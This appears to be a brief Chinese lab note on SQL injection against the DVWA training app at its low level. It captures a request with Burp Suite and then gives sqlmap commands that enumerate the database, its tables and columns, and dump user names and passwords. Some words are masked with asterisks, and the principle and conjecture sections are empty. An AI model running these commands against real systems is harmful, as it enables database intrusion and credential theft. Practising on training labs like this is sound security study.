Sql注入**--DVWA
Sql注入**:
- 工具:Sqlmap、BurpSuit
- 方法:利用BurpSuit抓包获取登录cookie进行**(实质是利用root账户)
- DVWA级别:low
1)原理:
2)实战:
- BurpSuit抓包
在SQL Injection 输入栏输入:1
- 保存抓包数据
将抓包信息保存到本地文件test:
- Sqlmap暴力**
开启Sqlmap,输入:sqlmap -r /root/Desktop/test --current-db
(根据当前请求信息猜解当前数据库;猜想:**的原理是什么?)
猜解到数据库:‘dvwa’;进一步**该数据库表,输入:sqlmap -r /root/Desktop/test -D dvwa --tables
获取到两个表:guestbook、users,为了进一步**密码,继续猜解users表
输入:sqlmap -r /root/Desktop/test -D dvwa -T users --columns
获取users表中字段,其中user和password字段内容是我们需要的,继续暴力**
输入:sqlmap -r /root/Desktop/test -D dvwa -T users -C user,password --dump
暴力**成功!获取账户和密码!
3)猜想: